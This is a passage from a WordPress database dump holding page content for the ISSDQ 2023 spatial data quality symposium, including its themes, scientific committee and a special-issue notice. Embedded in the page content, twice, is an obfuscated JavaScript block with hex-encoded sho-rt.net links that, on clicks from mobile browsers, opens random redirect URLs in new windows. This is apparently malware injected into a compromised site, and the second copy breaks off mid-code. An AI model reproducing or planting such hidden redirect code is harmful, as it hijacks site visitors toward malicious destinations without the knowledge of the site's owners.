UK</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Bahareh Kalantar, Riken, Japan</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Nicholas Hamm, Nottingham University China Campus, China</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Firoozeh Karimi, North Carolina A &amp; T, US</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong><a href=\"mailto:Mingshu%20Wang,%20Glasgow%20University,%20UK%20%20.ac.uk\">Mingshu Wang, Glasgow University, UK </a></strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Umit Isikdag, Istanbul Technical University, Turkey</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria, South Africa</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Mei-Po Kwan, Chinese University of Hong Kong, Hong Kong</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Cidalia Fonte, University of Coimbra, Portugal</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>Bin Jiang, University of Galve, Sweden</strong></h6>\r\n</li>\r\n</ul>\r\n[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<img class=\"alignnone size-medium wp-image-2805\" src=\"https://gsw2023.com/wp-content/uploads/2022/10/m4-300x180.jpg\" alt=\"\" width=\"300\" height=\"180\" />\r\n<h5 style=\"text-align: justify; color: red;\"><strong><u>Special Issue dedicated to the workshop: </u></strong></h5>\r\n<h6 style=\"text-align: justify; color: black;\"><strong>After the workshop, authors of selected papers will be invited to submit extended versions of their papers to the ISPRS IJGI and Geospatial information Science (GSIS) journals. The papers being accepted after the peer-review process of the journal will appear in a special issue of the journals dedicated to this symposium. </strong></h6>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','publish','closed','closed','','issdq-2023-artificial-intelligence-and-uncertainty-modeling-in-spatial-analysis','','','2023-02-05 14:16:26','2023-02-05 14:16:26','',0,'https://gsw2023.com/?post_type=dt_portfolio&#038;p=2798',0,'dt_portfolio','',0),
(2799,1,'2022-10-14 16:08:21','2022-10-14 16:08:21','','m1','','inherit','open','closed','','m1-3','','','2022-10-14 16:08:21','2022-10-14 16:08:21','',2798,'https://gsw2023.com/wp-content/uploads/2022/10/m1-2.jpg',0,'attachment','image/jpeg',0),
(2800,1,'2022-10-14 16:08:33','2022-10-14 16:08:33','','ISSDQ  2023- Artificial Intelligence and Uncertainty Modeling in Spatial Analysis','','inherit','closed','closed','','2798-revision-v1','','','2022-10-14 16:08:33','2022-10-14 16:08:33','',2798,'https://gsw2023.com/?p=2800',0,'revision','',0),
(2802,1,'2022-10-14 16:17:26','2022-10-14 16:17:26','','m2','','inherit','open','closed','','m2','','','2022-10-14 16:17:26','2022-10-14 16:17:26','',2798,'https://gsw2023.com/wp-content/uploads/2022/10/m2.jpg',0,'attachment','image/jpeg',0),
(2803,1,'2022-10-14 16:20:24','2022-10-14 16:20:24','','m3','','inherit','open','closed','','m3','','','2022-10-14 16:20:24','2022-10-14 16:20:24','',2798,'https://gsw2023.com/wp-content/uploads/2022/10/m3.jpg',0,'attachment','image/jpeg',0),
(2804,1,'2022-10-14 16:23:42','2022-10-14 16:23:42','<p>[vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2802\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"3/4\"][vc_column_text]</p>\n<h5 style=\"text-align: justify; color: black;\"><strong>Spatial data quality concerns with the reliability, confidence and trustworthiness of spatial data and their fitness for use. In the new era of spatial big data, IoT, smart city, ubiquitous spatial information systems and volunteered data produced using space-borne, areal and geo-sensors as well as human sensors in the phases of collection, fusion and leveraging artificial intelligence for spatial information extraction, and modeling, the issue of spatial data quality and uncertainty assessment requires more attention than ever before. Spatial data quality and uncertainty assessment/modeling are integrated components of spatial information systems main functionalities in measuring, mapping, managing, modeling and monitoring. The 12<sup>th</sup> International Symposium on Spatial Data Quality (ISSDQ 2023) will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with a number of related geospatial workshops. The event will be held as a two-day single-track symposium of keynote and oral presentations as well as poster sessions and a panel discussion in the context of the ISPRS Geospatial Week.</strong></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Spatial data quality in space and time,</strong></h6>\n</li>\n<li>\n<h6><strong>Leveraging artificial intelligence in spatial data analysis and quality assessment,</strong></h6>\n</li>\n<li>\n<h6><strong>Collaborative spatial data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Uncertainty modeling, assessment and propagation in spatial analyses</strong></h6>\n</li>\n<li>\n<h6><strong>Error assessment and propagation in digital terrain modeling</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent methodologies to integrate and assess spatial data and spatial analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Smart spatial data infrastructures, land administration systems, cadastral surveying and mapping, BIM and their quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Interoperability issues in spatial data analysis</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessing big spatial data in spatial information science</strong></h6>\n</li>\n<li>\n<h6>Spatial and spatio-temporal statistics methods and th<strong>eir uncertainty assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Challenges in assessment of UBGI/UBGIS, GSN, autonomous driving, smart city, multidimensional GIS, UAV, marine GIS, disaster management, and real time spatial data collections, collation and processing</strong></h6>\n</li>\n<li>\n<h6><strong>Harmonization of spatial information models and standards</strong></h6>\n</li>\n<li>\n<h6><strong>Matching the spatial data quality of combining multiple datasets</strong></h6>\n</li>\n<li>\n<h6><strong>Increasing spatial data quality through fusion</strong></h6>\n</li>\n<li>\n<h6><strong>Deep learning spatial data quality assessment</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality assessment of transferability</strong></h6>\n</li>\n<li>\n<h6><strong>Spatial data quality visualization</strong></h6>\n</li>\n<li>\n<h6><strong>Web GIS data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Sensor-based data quality</strong></h6>\n</li>\n<li>\n<h6><strong>Intelligent GIS</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column width=\"1/4\"][vc_single_image image=\"2803\" img_size=\"1200x800\"][/vc_column][vc_column width=\"3/4\"][bsf-info-box icon_size=\"32\"]</p>\n<h5 style=\"text-align:justify; color:red;\"><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6><strong>Bryan C. Pijanowski, University of Purdue, US.</strong></h6>\n</li>\n<li>\n<h6><strong>Christophe Claramunt, Naval Academy Research Institute, France</strong></h6>\n</li>\n<li>\n<h6><strong>Giles Foody, Nottingham University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Qiming Zhou, Baptist University, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Mir Abolfazl Mostafavi, Laval University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Nico vande Weghe, Ghent University, Belgium</strong></h6>\n</li>\n<li>\n<h6><strong>Alfred Stein, Twente University, The Netherlands</strong></h6>\n</li>\n<li>\n<h6><strong>John W.Z. Shi, The Hong Kong Polytechnic University, </strong></h6>\n<h6><strong>Hong Kong, China</strong></h6>\n</li>\n<li>\n<h6><strong>Gerhard Navratil, TU Wien, Austria</strong></h6>\n</li>\n<li>\n<h6><strong>Jamal Jokar Arsanjani, Aalborg University, Denmark</strong></h6>\n</li>\n<li>\n<h6><strong>Ana-Maria Raimond, IGN, France</strong></h6>\n</li>\n<li>\n<h6><strong>Jan Blachowski, Warsaw University, Poland</strong></h6>\n</li>\n<li>\n<h6><strong>Yongze Song, Curtin University, Australia</strong></h6>\n</li>\n<li>\n<h6><strong>Mojgan Jadidi, York University, Canada</strong></h6>\n</li>\n<li>\n<h6><strong>Hossein Chavoshi, University of Life Science, Norway</strong></h6>\n</li>\n<li>\n<h6><strong>Robert G. Pontious, Clark University, US</strong></h6>\n</li>\n<li>\n<h6><strong>Alexis Comber, Leeds University, UK</strong></h6>\n</li>\n<li>\n<h6><strong>Bahareh Kalantar, Riken, Japan</strong></h6>\n</li>\n<li>\n<h6><strong>Nicholas Hamm, Nottingham University China Campus, China</strong></h6>\n</li>\n<li>\n<h6><strong>Firoozeh Karimi, North Carolina A &amp; T, US</strong></h6>\n</li>\n<li>\n<h6><strong><a href=\"mailto:Mingshu%20Wang,%20Glasgow%20University,%20UK%20%20.ac.uk\">Mingshu Wang, Glasgow University, UK </a></strong></h6>\n</li>\n<li>\n<h6><strong>Umit Isikdag, Istanbul Technical University, Turkey</strong></h6>\n</li>\n<li>\n<h6><strong>Inger Fabris-Rotelli, University of Pretoria, South Africa</strong></h6>\n</li>\n<li>\n<h6><strong>Mei-Po Kwan, Chinese University of Hong Kong, Hong Kong</strong></h6>\n</li>\n<li>\n<h6><strong>Cidalia Fonte, University of Coimbra, Portugal</strong></h6>\n</li>\n<li>\n<h6><strong>Bin Jiang, University of Galve, Sweden</strong></h6>\n</li>\n</ul>\n<p>[/bsf-info-box][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"8\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const 